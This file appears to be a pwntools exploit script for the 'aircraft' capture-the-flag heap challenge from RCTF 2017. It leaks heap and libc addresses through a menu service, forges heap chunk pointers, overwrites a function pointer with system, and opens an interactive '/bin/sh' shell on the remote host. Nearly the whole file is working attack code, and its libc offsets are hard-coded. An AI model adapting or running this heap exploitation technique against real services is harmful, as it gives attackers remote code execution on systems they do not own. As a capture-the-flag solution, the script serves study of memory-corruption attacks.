- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- from pwn import *
host = "aircraft.2017.teamrois.cn"
port = 9731
# One global connection; every menu helper below reads and writes through `r`.
r = remote(host,port)
def buy(name, idx):
    """Send "1" at the first ':' prompt, then *idx*, then *name* at the next two."""
    replies = ("1", str(idx), name)
    for reply in replies:
        r.recvuntil(":")
        r.sendline(reply)
def build(name, size):
    """Send "2" at the ':' prompt, *size* at the '?' prompt, then *name* at the ':' prompt."""
    script = [(":", "2"), ("?", str(size)), (":", name)]
    for prompt, reply in script:
        r.recvuntil(prompt)
        r.sendline(reply)
def enterair(idx):
    """Send "3" at the ':' prompt and *idx* at the following '?' prompt."""
    for prompt, reply in ((":", "3"), ("?", str(idx))):
        r.recvuntil(prompt)
        r.sendline(reply)
def selair(idx):
    """Run enterair(idx), then send "2" once "Your choice:" has been received."""
    enterair(idx)
    prompt, choice = "Your choice:", "2"
    r.recvuntil(prompt)
    r.sendline(choice)
def listplant(idx):
    """Run enterair(idx), then send "1" at the next ':' prompt."""
    enterair(idx)
    choice = "1"
    r.recvuntil(":")
    r.sendline(choice)
def selectpla(name):
    """Send "4" at the ':' prompt and *name* at the following '?' prompt."""
    for prompt, reply in ((":", "4"), ("?", name)):
        r.recvuntil(prompt)
        r.sendline(reply)
def selplant(name):
    """Run selectpla(name), then send "2" at the next ':' prompt."""
    selectpla(name)
    choice = "2"
    r.recvuntil(":")
    r.sendline(choice)
def fly(name, idx):
    """Run selectpla(name), send "1" at the ':' prompt, then *idx* at the '?' prompt."""
    selectpla(name)
    for prompt, reply in ((":", "1"), ("?", str(idx))):
        r.recvuntil(prompt)
        r.sendline(reply)
def ret():
    """Send "3" once "Your choice:" has been received."""
    back = "3"
    r.recvuntil("Your choice:")
    r.sendline(back)
# Interaction sequence; every step talks to the global `r` through the helpers above.
buy("a"*0x18,1)
build("orange",0x30)
build("meh",0x80)
buy("ddaa",13)
fly("ddaa",0)
ret()
listplant(0)
# Take the bytes printed after "Build by " up to the newline, zero-pad to 8 bytes,
# unpack with u64 and subtract a fixed 0xf0 to obtain `heap`.
r.recvuntil("Build by ")
data = r.recvuntil("\n")[:-1]
heap = u64(data.ljust(8,"\x00")) - 0xf0
print "heap:",hex(heap)
ret()
selplant("ddaa")
build("b"*0x20 + p64(heap+0x130) + p64(heap+0x30) + p64(heap+0x10) ,0x48)
buy("1337",1)
selair(1)
listplant(0)
# Same read as above; 0x3c3b78 is a hard-coded offset, presumably tied to the
# target's libc build -- NOTE(review): the script will not work against another build.
r.recvuntil("Build by ")
data = r.recvuntil("\n")[:-1]
libc = u64(data.ljust(8,"\x00")) - 0x3c3b78
print "libc:",hex(libc)
ret()
build("fish",0x30) #3
buy("lays",0)
fly("lays",3)
selplant("lays")
free_chunk = libc + 0x3c3b40  # hard-coded libc-relative offset, same caveat as above
build("c"*0x30 + p64(free_chunk-0x38) + p64(heap) ,0x48)
selair(3)
r.recvuntil(":")
buy("lays",0)
system = libc+ 0x45390  # hard-coded libc-relative offset, same caveat as above
# p64(system)[:7] drops the last byte of the packed value, so the payload is one byte shorter.
build("/bin/sh".ljust(0x20,"\x00") + p64(heap+0x130) + p64(heap+240) + p64(heap+0x10) + p64(0) + p64(system)[:7] ,0x48)
selplant("/bin/sh")
r.interactive()